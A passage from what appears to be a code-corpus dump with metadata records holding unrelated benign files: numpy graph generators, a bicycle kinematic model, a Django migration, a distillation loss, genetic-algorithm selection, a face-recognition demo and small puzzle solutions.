Example 1 -- 2 -- 3 | | | 4 -- 5 -- 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The two-dimensional rectangular grid lattice graph (num_edges x 2) """ w = width kernel = np.array([-w, -1, 1, w]) return grid(height, width, kernel) def grid(height: int, width: int, kernel: NDArray) -> NDArray: """ Ausiliar function for grid graph generation. Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis kernel : NDArray The kernel Returns ------- NDArray The two-dimensional grid lattice graph (num_edges x 2) """ num_nodes = height * width K = len(kernel) sources = np.arange(num_nodes, dtype=np.long).repeat(K) targets = sources + np.tile(kernel, num_nodes) mask = (targets >= 0) & (targets < num_nodes) sources, targets = sources[mask].reshape((-1, 1)), targets[mask].reshape((-1, 1)) edge_list = np.concatenate([sources, targets], axis=1) # Remove edges (u,v) from a boundary node to the first node of the new row. submask_1 = ((edge_list[:, 0] + 1) % width == 0) & ((edge_list[:, 1]) % width == 0) # As the graph is undirected, remove the corresponding edges (v, u). submask_2 = ((edge_list[:, 0]) % width == 0) & ((edge_list[:, 1] + 1) % width == 0) mask = ~(submask_1 | submask_2) return edge_list[mask] def star(num_nodes: int, directed: bool = False) -> NDArray: """ Returns a star graph. 
Parameters ---------- num_nodes : int The number of nodes directed : bool, optional If set to True, will return a directed graph, by default False Returns ------- NDArray The star graph (num_edges x 2) """ edges = np.stack([np.zeros((num_nodes - 1, ), dtype = int), np.arange(1, num_nodes)], axis=1) if not directed: edges = to_undirected(edges) return edges def random_tree(num_nodes: int, directed: bool = True, rng: Optional[Generator] = None) -> NDArray: """ Returns a random tree computed using a random Prufer sequence. Parameters ---------- num_nodes : int [description] directed : bool, optional If set to True, will return a directed graph, by default True rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The random tree (num_edges x 2) """ if rng is None: rng = default_rng() prufer_seq = [rng.choice(range(num_nodes)) for _ in range(num_nodes - 2)] # Node degree is equivalent to the number of times it appears in the sequence + 1 degree = Counter(prufer_seq + list(range(num_nodes))) edges = [] visited = set() for v in prufer_seq: for u in range(num_nodes): if degree[u] == 1: edges.append([v, u]) degree[v] -= 1 degree[u] -= 1 visited.add(u) break u, v = degree.keys() - visited edges.append([u,v]) edges = np.asarray(edges) if not directed: edges = to_undirected(edges) return edges
en
0.720879
Returns a random graph, also known as an Erdos-Renyi graph or a binomial graph. The model chooses each of the possible edges with a defined probability. Parameters ---------- num_nodes : int The number of nodes prob : float Probability of an edge directed : bool, optional If set to True, will return a directed graph, by default False rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The random graph (num_edges x 2) Returns a graph sampled from the Barabasi-Albert (BA) model. The graph is built incrementally by adding `num_edges` arcs from a new node to already existing ones with preferential attachment towards nodes with high degree. Parameters ---------- num_nodes : int The number of nodes num_edges : int The number of edges rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The Barabasi-Albert (num_edges x 2) Returns a complete graph, a.k.a. a clique. Parameters ---------- num_nodes : int The number of nodes Returns ------- NDArray The clique (num_edges x 2) Returns a stochastic block model graph. This model partitions the nodes into blocks of defined sizes, and places edges between pairs of nodes depending on a probability matrix. Such a matrix specifies edge probabilities between and inside blocks. Parameters ---------- block_sizes : List[int] Sizes of blocks probs : List[List[float]] The squared probability matrix (num_blocks x num_blocks). The element i,j represents the edge probability between blocks i and j. The element i,i define the edge probability inside block i. generator : Callable A callable that generates communities with size depending on block_sizes rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The stochastic block model graph (num_edges x 2) # Update communities's indices # Compute iter-block links Returns a full two-dimensional rectangular grid lattice graph. 
Example 1 - 2 - 3 | X | X | 4 - 5 - 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The full two-dimensional rectangular grid lattice graph (num_edges x 2) Returns a two-dimensional rectangular grid lattice graph. Example 1 -- 2 -- 3 | | | 4 -- 5 -- 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The two-dimensional rectangular grid lattice graph (num_edges x 2) Ausiliar function for grid graph generation. Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis kernel : NDArray The kernel Returns ------- NDArray The two-dimensional grid lattice graph (num_edges x 2) # Remove edges (u,v) from a boundary node to the first node of the new row. # As the graph is undirected, remove the corresponding edges (v, u). Returns a star graph. Parameters ---------- num_nodes : int The number of nodes directed : bool, optional If set to True, will return a directed graph, by default False Returns ------- NDArray The star graph (num_edges x 2) Returns a random tree computed using a random Prufer sequence. Parameters ---------- num_nodes : int [description] directed : bool, optional If set to True, will return a directed graph, by default True rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The random tree (num_edges x 2) # Node degree is equivalent to the number of times it appears in the sequence + 1
3.228185
3
command_prediction/bicycle.py
fiit-team-08/car-components-app
0
6618566
from math import cos, sin, tan, atan2 import numpy as np class BicycleKinematicModel: def __init__(self, x, y, steering_angle, heading_angle, bicycle_len=1, time_step=0.1): self._x = x # meters self._y = y # meters self._steering_angle = steering_angle # radians self._heading_angle = heading_angle # radians self.bicycle_len = bicycle_len # meters self.time_step = time_step # seconds def get_state(self): return self._x, self._y, self._steering_angle, self._heading_angle def change_state(self, velocity, steering_rate): """ Changes its state according to the input: a velocity and a steering rate. The next state is evaluated regarding the reference point at the rear axle. Parameters =========== velocity : float Current velocity of a bicycle. steering_rate : float Angle change rate. """ if self._steering_angle == 0: rotation_rate = 0 else: R = self.bicycle_len / tan(self._steering_angle) rotation_rate = velocity / R delta_x = velocity * cos(self._heading_angle) delta_y = velocity * sin(self._heading_angle) delta_theta = rotation_rate delta_sigma = steering_rate self._x += delta_x * self.time_step self._y += delta_y * self.time_step self._heading_angle += delta_theta * self.time_step self._heading_angle = np.deg2rad(np.rad2deg(atan2(sin(self._heading_angle), cos(self._heading_angle))) % 360) self._steering_angle += delta_sigma
from math import cos, sin, tan, atan2 import numpy as np class BicycleKinematicModel: def __init__(self, x, y, steering_angle, heading_angle, bicycle_len=1, time_step=0.1): self._x = x # meters self._y = y # meters self._steering_angle = steering_angle # radians self._heading_angle = heading_angle # radians self.bicycle_len = bicycle_len # meters self.time_step = time_step # seconds def get_state(self): return self._x, self._y, self._steering_angle, self._heading_angle def change_state(self, velocity, steering_rate): """ Changes its state according to the input: a velocity and a steering rate. The next state is evaluated regarding the reference point at the rear axle. Parameters =========== velocity : float Current velocity of a bicycle. steering_rate : float Angle change rate. """ if self._steering_angle == 0: rotation_rate = 0 else: R = self.bicycle_len / tan(self._steering_angle) rotation_rate = velocity / R delta_x = velocity * cos(self._heading_angle) delta_y = velocity * sin(self._heading_angle) delta_theta = rotation_rate delta_sigma = steering_rate self._x += delta_x * self.time_step self._y += delta_y * self.time_step self._heading_angle += delta_theta * self.time_step self._heading_angle = np.deg2rad(np.rad2deg(atan2(sin(self._heading_angle), cos(self._heading_angle))) % 360) self._steering_angle += delta_sigma
en
0.848777
# meters # meters # radians # radians # meters # seconds Changes its state according to the input: a velocity and a steering rate. The next state is evaluated regarding the reference point at the rear axle. Parameters =========== velocity : float Current velocity of a bicycle. steering_rate : float Angle change rate.
3.530833
4
src/app.py
aaditkamat/Audily
6
6618567
<gh_stars>1-10 import requests, json, cv2, glob, os from playsound import playsound addr = 'http://localhost:5000' test_url = addr + '/audify' content_type = 'image/jpeg' headers = {'content-type': content_type} img = cv2.imread('../assets/book1.jpg') _, img_encoded = cv2.imencode('.jpg', img) response = requests.post(test_url, data=img_encoded.tostring(), headers=headers) list_of_files = glob.glob('./all_recordings/*') latest_file = max(list_of_files, key=os.path.getctime) print (latest_file) playsound(latest_file)
import requests, json, cv2, glob, os from playsound import playsound addr = 'http://localhost:5000' test_url = addr + '/audify' content_type = 'image/jpeg' headers = {'content-type': content_type} img = cv2.imread('../assets/book1.jpg') _, img_encoded = cv2.imencode('.jpg', img) response = requests.post(test_url, data=img_encoded.tostring(), headers=headers) list_of_files = glob.glob('./all_recordings/*') latest_file = max(list_of_files, key=os.path.getctime) print (latest_file) playsound(latest_file)
none
1
2.520042
3
app/migrations/0005_cache.py
taojy123/Babylon
0
6618568
<gh_stars>0 # Generated by Django 3.0.8 on 2020-08-04 07:30 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0004_auto_20200804_1141'), ] operations = [ migrations.CreateModel( name='Cache', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('cookie', models.TextField(blank=True)), ('tk', models.TextField(blank=True)), ], ), ]
# Generated by Django 3.0.8 on 2020-08-04 07:30 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0004_auto_20200804_1141'), ] operations = [ migrations.CreateModel( name='Cache', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('cookie', models.TextField(blank=True)), ('tk', models.TextField(blank=True)), ], ), ]
en
0.825327
# Generated by Django 3.0.8 on 2020-08-04 07:30
1.698732
2
workin/exts/auth/hasher.py
waderly/workin
1
6618569
#!/usr/bin/env python # -*- coding: utf-8 -*- try: from django_hasher import check_password, make_password except ImportError: import bcrypt def make_password(password): return bcrypt.hashpw(password, bcrypt.gensalt()) def check_password(password, hashed): return bcrypt.hashpw(password, hashed) == hashed
#!/usr/bin/env python # -*- coding: utf-8 -*- try: from django_hasher import check_password, make_password except ImportError: import bcrypt def make_password(password): return bcrypt.hashpw(password, bcrypt.gensalt()) def check_password(password, hashed): return bcrypt.hashpw(password, hashed) == hashed
en
0.352855
#!/usr/bin/env python # -*- coding: utf-8 -*-
2.375114
2
srcs/dist_loss.py
cs6787/PIXOR
0
6618570
<reponame>cs6787/PIXOR import torch import torch.nn as nn import torch.nn.functional as F ### LOSS FUNCTION FOR KNOWLEDGE DISTILLATION ### class CustomDistLoss(nn.Module): def __init__(self, device, config, num_classes=1): super(CustomDistLoss, self).__init__() self.num_classes = num_classes self.device = device self.alpha = config['alpha'] # used to reduce cross entropy loss self.beta = config['beta'] # used to reduce regression loss # weight between teacher and training loss self.mew = config['mew'] self.nu = config['nu'] self.margin = config['margin'] # calculates the binary cross entropy loss between x and y # given that x and y have dimensions [batch_size, 1, 200, 175] def cross_entropy(self, x, y): return F.binary_cross_entropy(input=x, target=y, reduction='mean') def teacher_reg_loss(self, loc_preds, loc_teacher_preds, loc_targets): student_squared_diff = torch.square(loc_preds - loc_targets) teacher_squared_diff = torch.square(loc_teacher_preds - loc_targets) # to determine whether to keep the student squared difference check_margin = torch.gt(student_squared_diff + self.margin, teacher_squared_diff) reg_error = check_margin * student_squared_diff #reg_error = torch.sum(reg_error) return reg_error def forward(self, preds, teacher_preds, targets): batch_size = targets.size(0) cls_targets, loc_targets = targets.split([1, 6], dim=1) if preds.size(1) == 7: cls_preds, loc_preds = preds.split([1, 6], dim=1) cls_teacher_preds, loc_teacher_preds = teacher_preds.split([ 1, 6], dim=1) elif preds.size(1) == 15: cls_preds, loc_preds, _ = preds.split([1, 6, 8], dim=1) cls_teacher_preds, loc_teacher_preds, _ = teacher_preds.split([ 1, 6, 8], dim=1) test = cls_preds.sum() test2 = loc_preds.sum() if torch.isnan(test): print("Classification returning nans") if torch.isnan(test2): print("Regression is returning nans") # calculating cross entropy with respect to the training data cls_loss_training = self.cross_entropy( cls_preds, cls_targets) # calculating cross entropy with 
respect to the teacher data cls_loss_teacher = self.cross_entropy( cls_preds, cls_teacher_preds) # adding the two cross entropies together - factor alpha to lower cross entropy loss cls_loss = (self.mew * cls_loss_training + (1 - self.mew) * cls_loss_teacher) * self.alpha # only evaluating regression on points where the targets are non-zero (for classification) # this is because regression can be very wrong and contradictory to the ground truth pos_pixels_targets = cls_targets.sum() #print("Pos pixel targets is: ", pos_pixels_targets) # calculating regression loss with respect to target values # multiply by beta, regression reduction factor if pos_pixels_targets > 0: loc_loss_training = F.smooth_l1_loss( cls_targets * loc_preds, loc_targets, reduction='sum') / pos_pixels_targets * self.beta loc_loss_teacher = self.teacher_reg_loss( cls_targets * loc_preds, cls_targets * loc_teacher_preds, loc_targets) loc_loss_teacher = torch.sum( loc_loss_teacher) / pos_pixels_targets * self.beta else: loc_loss_training = torch.Tensor([0.]).to( self.device) # avoiding divide by 0 errors loc_loss_teacher = torch.Tensor([0.]).to( self.device) # avoiding divide by 0 errors loc_loss = loc_loss_training + loc_loss_teacher * self.nu # print(cls_loss_training) # print(cls_loss_training.device) #cpu_device = torch.device('cpu') # print(cls_loss_training.to(cpu_device)) # print(cls_loss_training.device) loss = cls_loss + loc_loss cls = cls_loss_training.item() * self.mew * self.alpha cls_teacher = cls_loss_teacher.item() * (1 - self.mew) * self.alpha loc = loc_loss_training.item() loc_teacher = loc_loss_teacher.item() * self.nu # print("break") # print("Loss: ", str(loss.item())) # print("Cls loss: ", str(cls)) # print("Cls loss teacher: ", str(cls_teacher)) # print("Regression loss: ", str(loc)) # print("Regression loss teacher: ", str(loc_teacher)) return loss, cls, loc, cls_teacher, loc_teacher
import torch import torch.nn as nn import torch.nn.functional as F ### LOSS FUNCTION FOR KNOWLEDGE DISTILLATION ### class CustomDistLoss(nn.Module): def __init__(self, device, config, num_classes=1): super(CustomDistLoss, self).__init__() self.num_classes = num_classes self.device = device self.alpha = config['alpha'] # used to reduce cross entropy loss self.beta = config['beta'] # used to reduce regression loss # weight between teacher and training loss self.mew = config['mew'] self.nu = config['nu'] self.margin = config['margin'] # calculates the binary cross entropy loss between x and y # given that x and y have dimensions [batch_size, 1, 200, 175] def cross_entropy(self, x, y): return F.binary_cross_entropy(input=x, target=y, reduction='mean') def teacher_reg_loss(self, loc_preds, loc_teacher_preds, loc_targets): student_squared_diff = torch.square(loc_preds - loc_targets) teacher_squared_diff = torch.square(loc_teacher_preds - loc_targets) # to determine whether to keep the student squared difference check_margin = torch.gt(student_squared_diff + self.margin, teacher_squared_diff) reg_error = check_margin * student_squared_diff #reg_error = torch.sum(reg_error) return reg_error def forward(self, preds, teacher_preds, targets): batch_size = targets.size(0) cls_targets, loc_targets = targets.split([1, 6], dim=1) if preds.size(1) == 7: cls_preds, loc_preds = preds.split([1, 6], dim=1) cls_teacher_preds, loc_teacher_preds = teacher_preds.split([ 1, 6], dim=1) elif preds.size(1) == 15: cls_preds, loc_preds, _ = preds.split([1, 6, 8], dim=1) cls_teacher_preds, loc_teacher_preds, _ = teacher_preds.split([ 1, 6, 8], dim=1) test = cls_preds.sum() test2 = loc_preds.sum() if torch.isnan(test): print("Classification returning nans") if torch.isnan(test2): print("Regression is returning nans") # calculating cross entropy with respect to the training data cls_loss_training = self.cross_entropy( cls_preds, cls_targets) # calculating cross entropy with respect to the teacher 
data cls_loss_teacher = self.cross_entropy( cls_preds, cls_teacher_preds) # adding the two cross entropies together - factor alpha to lower cross entropy loss cls_loss = (self.mew * cls_loss_training + (1 - self.mew) * cls_loss_teacher) * self.alpha # only evaluating regression on points where the targets are non-zero (for classification) # this is because regression can be very wrong and contradictory to the ground truth pos_pixels_targets = cls_targets.sum() #print("Pos pixel targets is: ", pos_pixels_targets) # calculating regression loss with respect to target values # multiply by beta, regression reduction factor if pos_pixels_targets > 0: loc_loss_training = F.smooth_l1_loss( cls_targets * loc_preds, loc_targets, reduction='sum') / pos_pixels_targets * self.beta loc_loss_teacher = self.teacher_reg_loss( cls_targets * loc_preds, cls_targets * loc_teacher_preds, loc_targets) loc_loss_teacher = torch.sum( loc_loss_teacher) / pos_pixels_targets * self.beta else: loc_loss_training = torch.Tensor([0.]).to( self.device) # avoiding divide by 0 errors loc_loss_teacher = torch.Tensor([0.]).to( self.device) # avoiding divide by 0 errors loc_loss = loc_loss_training + loc_loss_teacher * self.nu # print(cls_loss_training) # print(cls_loss_training.device) #cpu_device = torch.device('cpu') # print(cls_loss_training.to(cpu_device)) # print(cls_loss_training.device) loss = cls_loss + loc_loss cls = cls_loss_training.item() * self.mew * self.alpha cls_teacher = cls_loss_teacher.item() * (1 - self.mew) * self.alpha loc = loc_loss_training.item() loc_teacher = loc_loss_teacher.item() * self.nu # print("break") # print("Loss: ", str(loss.item())) # print("Cls loss: ", str(cls)) # print("Cls loss teacher: ", str(cls_teacher)) # print("Regression loss: ", str(loc)) # print("Regression loss teacher: ", str(loc_teacher)) return loss, cls, loc, cls_teacher, loc_teacher
en
0.823113
### LOSS FUNCTION FOR KNOWLEDGE DISTILLATION ### # used to reduce cross entropy loss # used to reduce regression loss # weight between teacher and training loss # calculates the binary cross entropy loss between x and y # given that x and y have dimensions [batch_size, 1, 200, 175] # to determine whether to keep the student squared difference #reg_error = torch.sum(reg_error) # calculating cross entropy with respect to the training data # calculating cross entropy with respect to the teacher data # adding the two cross entropies together - factor alpha to lower cross entropy loss # only evaluating regression on points where the targets are non-zero (for classification) # this is because regression can be very wrong and contradictory to the ground truth #print("Pos pixel targets is: ", pos_pixels_targets) # calculating regression loss with respect to target values # multiply by beta, regression reduction factor # avoiding divide by 0 errors # avoiding divide by 0 errors # print(cls_loss_training) # print(cls_loss_training.device) #cpu_device = torch.device('cpu') # print(cls_loss_training.to(cpu_device)) # print(cls_loss_training.device) # print("break") # print("Loss: ", str(loss.item())) # print("Cls loss: ", str(cls)) # print("Cls loss teacher: ", str(cls_teacher)) # print("Regression loss: ", str(loc)) # print("Regression loss teacher: ", str(loc_teacher))
2.725894
3
src/pygenec/selecao/classificacao.py
duducosmos/pygenec
1
6618571
<reponame>duducosmos/pygenec<gh_stars>1-10 #!/usr/bin/env python3.6 # -*- Coding: UTF-8 -*- """ Roleta de Seleção de Indivíduos para cruzamento, classificação. Programa sob licença GNU V.3. Desenvolvido por: <NAME>. Versão 0.0.1. """ from numpy.random import random from numpy import array, argsort from .selecao import Selecao class Classificacao(Selecao): """ Seleciona indivíduos para cruzamento usando Classificação. Recebe como entrada: populacao - Objeto criado a partir da classe Populacao. """ def __init__(self, populacao): super(Classificacao, self).__init__(populacao) def selecionar(self, fitness): """Roleta de seleção de indivíduos.""" if fitness is None: fitness = self.populacao.avaliar() classificacao = argsort(fitness) + 1 total = classificacao.sum() parada = total * random() parcial = 0 i = 0 while True: if i > fitness.size - 1: break parcial += classificacao[i] if parcial >= parada: break i += 1 return i - 1
#!/usr/bin/env python3.6 # -*- Coding: UTF-8 -*- """ Roleta de Seleção de Indivíduos para cruzamento, classificação. Programa sob licença GNU V.3. Desenvolvido por: <NAME>. Versão 0.0.1. """ from numpy.random import random from numpy import array, argsort from .selecao import Selecao class Classificacao(Selecao): """ Seleciona indivíduos para cruzamento usando Classificação. Recebe como entrada: populacao - Objeto criado a partir da classe Populacao. """ def __init__(self, populacao): super(Classificacao, self).__init__(populacao) def selecionar(self, fitness): """Roleta de seleção de indivíduos.""" if fitness is None: fitness = self.populacao.avaliar() classificacao = argsort(fitness) + 1 total = classificacao.sum() parada = total * random() parcial = 0 i = 0 while True: if i > fitness.size - 1: break parcial += classificacao[i] if parcial >= parada: break i += 1 return i - 1
pt
0.959718
#!/usr/bin/env python3.6 # -*- Coding: UTF-8 -*- Roleta de Seleção de Indivíduos para cruzamento, classificação. Programa sob licença GNU V.3. Desenvolvido por: <NAME>. Versão 0.0.1. Seleciona indivíduos para cruzamento usando Classificação. Recebe como entrada: populacao - Objeto criado a partir da classe Populacao. Roleta de seleção de indivíduos.
3.240047
3
keyboardstream2py/__init__.py
i2mint/keyboardstream2py
0
6618572
"""Keyboard input stream2py interface""" from keyboardstream2py.keyboard_input import KeyboardInputSourceReader
"""Keyboard input stream2py interface""" from keyboardstream2py.keyboard_input import KeyboardInputSourceReader
en
0.589219
Keyboard input stream2py interface
1.291462
1
mercury_engine_data_structures/adapters/offset.py
duncathan/mercury-engine-data-structures
2
6618573
from construct import Adapter, AdaptationError class OffsetAdapter(Adapter): # stores offsets as indices def _get_table(self, context): raise NotImplementedError() def _get_table_length(self, context): raise NotImplementedError() def _get_base_offset(self, context): return 0 def _get_item_size(self, item): return item.size def _decode(self, obj, context, path): table = self._get_table(context) offset = obj size = self._get_base_offset(context) for i in range(self._get_table_length(context)): if size == offset: return i if size > offset: raise AdaptationError("No string begins at the requested offset!") item = table[i] size += self._get_item_size(item) def _encode(self, obj, context, path): table = self._get_table(context) index = obj size = self._get_base_offset(context) for i in range(self._get_table_length(context)): if i == index: return size item = table[i] size += self._get_item_size(item)
from construct import Adapter, AdaptationError class OffsetAdapter(Adapter): # stores offsets as indices def _get_table(self, context): raise NotImplementedError() def _get_table_length(self, context): raise NotImplementedError() def _get_base_offset(self, context): return 0 def _get_item_size(self, item): return item.size def _decode(self, obj, context, path): table = self._get_table(context) offset = obj size = self._get_base_offset(context) for i in range(self._get_table_length(context)): if size == offset: return i if size > offset: raise AdaptationError("No string begins at the requested offset!") item = table[i] size += self._get_item_size(item) def _encode(self, obj, context, path): table = self._get_table(context) index = obj size = self._get_base_offset(context) for i in range(self._get_table_length(context)): if i == index: return size item = table[i] size += self._get_item_size(item)
en
0.968439
# stores offsets as indices
2.647463
3
app/eSignature/examples/eg019_access_code_authentication/__init__.py
olegliubimov/code-examples-python
21
6618574
from .views import eg019
from .views import eg019
none
1
1.049578
1
face_distance.py
mostofashakib/Image-Analysis-and-Real-Time-Face-Recognition-system
0
6618575
<filename>face_distance.py import face_recognition """ Goal: Check if two faces are a match or not using that face_distance function from face_recognition. Metrics: The model is trained in a way that faces with a distance of 0.6 or less are a match. A strict cut off of 0.5 is imposed. Although it increases the risk of more false negatives but the number of false positive matches are reduced. Observations: This isn't exactly the same as a "percent match". The scale isn't linear. But it's safe to assume that images with a smaller distance are more similar to each other than ones with a larger distance. """ # Load some images to compare against known_obama_image = face_recognition.load_image_file("obama.jpg") known_biden_image = face_recognition.load_image_file("biden.jpg") # Get the face encodings for the known images obama_face_encoding = face_recognition.face_encodings(known_obama_image)[0] biden_face_encoding = face_recognition.face_encodings(known_biden_image)[0] known_encodings = [ obama_face_encoding, biden_face_encoding ] # Load a test image and get encondings for it image_to_test = face_recognition.load_image_file("obama2.jpg") image_to_test_encoding = face_recognition.face_encodings(image_to_test)[0] # See how far apart the test image is from the known faces face_distances = face_recognition.face_distance(known_encodings, image_to_test_encoding) for i, face_distance in enumerate(face_distances): print("The test image has a distance of {:.2} from known image #{}".format(face_distance, i)) print("- With a normal cutoff of 0.6, would the test image match the known image? {}".format(face_distance < 0.6)) print("- With a very strict cutoff of 0.5, would the test image match the known image? {}".format(face_distance < 0.5)) if face_distance < 0.5: print("- This is the 44th US President Barak Obama") else: print("- This is not President Barak Obama") print()
<filename>face_distance.py import face_recognition """ Goal: Check if two faces are a match or not using that face_distance function from face_recognition. Metrics: The model is trained in a way that faces with a distance of 0.6 or less are a match. A strict cut off of 0.5 is imposed. Although it increases the risk of more false negatives but the number of false positive matches are reduced. Observations: This isn't exactly the same as a "percent match". The scale isn't linear. But it's safe to assume that images with a smaller distance are more similar to each other than ones with a larger distance. """ # Load some images to compare against known_obama_image = face_recognition.load_image_file("obama.jpg") known_biden_image = face_recognition.load_image_file("biden.jpg") # Get the face encodings for the known images obama_face_encoding = face_recognition.face_encodings(known_obama_image)[0] biden_face_encoding = face_recognition.face_encodings(known_biden_image)[0] known_encodings = [ obama_face_encoding, biden_face_encoding ] # Load a test image and get encondings for it image_to_test = face_recognition.load_image_file("obama2.jpg") image_to_test_encoding = face_recognition.face_encodings(image_to_test)[0] # See how far apart the test image is from the known faces face_distances = face_recognition.face_distance(known_encodings, image_to_test_encoding) for i, face_distance in enumerate(face_distances): print("The test image has a distance of {:.2} from known image #{}".format(face_distance, i)) print("- With a normal cutoff of 0.6, would the test image match the known image? {}".format(face_distance < 0.6)) print("- With a very strict cutoff of 0.5, would the test image match the known image? {}".format(face_distance < 0.5)) if face_distance < 0.5: print("- This is the 44th US President Barak Obama") else: print("- This is not President Barak Obama") print()
en
0.949392
Goal: Check if two faces are a match or not using that face_distance function from face_recognition. Metrics: The model is trained in a way that faces with a distance of 0.6 or less are a match. A strict cut off of 0.5 is imposed. Although it increases the risk of more false negatives but the number of false positive matches are reduced. Observations: This isn't exactly the same as a "percent match". The scale isn't linear. But it's safe to assume that images with a smaller distance are more similar to each other than ones with a larger distance. # Load some images to compare against # Get the face encodings for the known images # Load a test image and get encondings for it # See how far apart the test image is from the known faces #{}".format(face_distance, i))
3.620567
4
007-Reverse-Integer/solution01.py
Eroica-cpp/LeetCode
7
6618576
<reponame>Eroica-cpp/LeetCode #!/usr/bin/python # ============================================================================== # Author: <NAME> (<EMAIL>) # Date: May 1, 2015 # Question: 007-Reverse-Integer # Link: https://leetcode.com/problems/reverse-integer/ # ============================================================================== # Reverse digits of an integer. # # Example1: x = 123, return 321 # Example2: x = -123, return -321 # ============================================================================== class Solution: # @param {integer} x # @return {integer} def reverse(self, x): if x < 0: return -self.reverse(-x) else: res = 0 while x: res = 10 * res + x % 10 x = x / 10 if res >= 2147483648: return 0 else: return res
#!/usr/bin/python # ============================================================================== # Author: <NAME> (<EMAIL>) # Date: May 1, 2015 # Question: 007-Reverse-Integer # Link: https://leetcode.com/problems/reverse-integer/ # ============================================================================== # Reverse digits of an integer. # # Example1: x = 123, return 321 # Example2: x = -123, return -321 # ============================================================================== class Solution: # @param {integer} x # @return {integer} def reverse(self, x): if x < 0: return -self.reverse(-x) else: res = 0 while x: res = 10 * res + x % 10 x = x / 10 if res >= 2147483648: return 0 else: return res
en
0.426115
#!/usr/bin/python # ============================================================================== # Author: <NAME> (<EMAIL>) # Date: May 1, 2015 # Question: 007-Reverse-Integer # Link: https://leetcode.com/problems/reverse-integer/ # ============================================================================== # Reverse digits of an integer. # # Example1: x = 123, return 321 # Example2: x = -123, return -321 # ============================================================================== # @param {integer} x # @return {integer}
3.744515
4
Leetcode/reverseInteger.py
lyndsiWilliams/code-challenge-solutions
0
6618577
def reverseInteger(x): ''' [::-1] This slice statement will start at the end of the string and end at position 0, moving with the step -1''' num_str = str(x) answer = 0 if x == 0: answer = 0 elif num_str[0] == "-": # Remove - from end of reversed string, add to front answer = int("-" + num_str[:0:-1]) else: # Normal reversal answer = int(num_str[::-1]) if answer not in range(-2**31, 2**31): print(0) else: print(answer) reverseInteger(120)
def reverseInteger(x): ''' [::-1] This slice statement will start at the end of the string and end at position 0, moving with the step -1''' num_str = str(x) answer = 0 if x == 0: answer = 0 elif num_str[0] == "-": # Remove - from end of reversed string, add to front answer = int("-" + num_str[:0:-1]) else: # Normal reversal answer = int(num_str[::-1]) if answer not in range(-2**31, 2**31): print(0) else: print(answer) reverseInteger(120)
en
0.810896
[::-1] This slice statement will start at the end of the string and end at position 0, moving with the step -1 # Remove - from end of reversed string, add to front # Normal reversal
4.027596
4
biosapi/core/__init__.py
Fxe/biosapi
0
6618578
<filename>biosapi/core/__init__.py<gh_stars>0 import biosapi.core.model from biosapi.core.bios_database_reaction import BiosDatabaseReaction
<filename>biosapi/core/__init__.py<gh_stars>0 import biosapi.core.model from biosapi.core.bios_database_reaction import BiosDatabaseReaction
none
1
1.062868
1
2020/18/18.py
pshatov/AoC
0
6618579
<reponame>pshatov/AoC<gh_stars>0 LINES = [] with open('input.txt') as f: for fl in f: LINES.append('(' + fl.strip() + ')') def extract_brackets(l): i_start = 0 for i_stop in range(1, len(l)): if l[i_stop] == ')': a = '' if i_start == 0 else l[0:i_start] b = l[i_start+1:i_stop] c = '' if i_stop == len(l)-1 else l[i_stop+1:len(l)] return a, b, c elif l[i_stop] == '(': i_start = i_stop raise RuntimeError def simplify_brackets1(b): bl = b.split(' ') r = int(bl[0]) for bi in range(1, len(bl), 2): bx, by = bl[bi], int(bl[bi+1]) if bx == '+': r += by elif bx == '*': r *= by return r def simplify_brackets2(b): bl = b.split(' ') while '+' in bl: for bi in range(1, len(bl), 2): if bl[bi] == '+': bl[bi] = str(int(bl[bi-1]) + int(bl[bi+1])) del bl[bi+1] del bl[bi-1] break r = int(bl[0]) for bi in range(2, len(bl), 2): r *= int(bl[bi]) return r def parse_line1(l): while l.startswith('('): a, b, c = extract_brackets(l) bb = simplify_brackets1(b) l = a + str(bb) + c return int(bb) def parse_line2(l): while l.startswith('('): a, b, c = extract_brackets(l) bb = simplify_brackets2(b) l = a + str(bb) + c return int(bb) s1 = 0 s2 = 0 for l in LINES: s1 += parse_line1(l) s2 += parse_line2(l) print("s1: %d" % s1) print("s2: %d" % s2)
LINES = [] with open('input.txt') as f: for fl in f: LINES.append('(' + fl.strip() + ')') def extract_brackets(l): i_start = 0 for i_stop in range(1, len(l)): if l[i_stop] == ')': a = '' if i_start == 0 else l[0:i_start] b = l[i_start+1:i_stop] c = '' if i_stop == len(l)-1 else l[i_stop+1:len(l)] return a, b, c elif l[i_stop] == '(': i_start = i_stop raise RuntimeError def simplify_brackets1(b): bl = b.split(' ') r = int(bl[0]) for bi in range(1, len(bl), 2): bx, by = bl[bi], int(bl[bi+1]) if bx == '+': r += by elif bx == '*': r *= by return r def simplify_brackets2(b): bl = b.split(' ') while '+' in bl: for bi in range(1, len(bl), 2): if bl[bi] == '+': bl[bi] = str(int(bl[bi-1]) + int(bl[bi+1])) del bl[bi+1] del bl[bi-1] break r = int(bl[0]) for bi in range(2, len(bl), 2): r *= int(bl[bi]) return r def parse_line1(l): while l.startswith('('): a, b, c = extract_brackets(l) bb = simplify_brackets1(b) l = a + str(bb) + c return int(bb) def parse_line2(l): while l.startswith('('): a, b, c = extract_brackets(l) bb = simplify_brackets2(b) l = a + str(bb) + c return int(bb) s1 = 0 s2 = 0 for l in LINES: s1 += parse_line1(l) s2 += parse_line2(l) print("s1: %d" % s1) print("s2: %d" % s2)
none
1
3.559525
4
core/ReadAndWrite.py
gieses/ARDEN
0
6618580
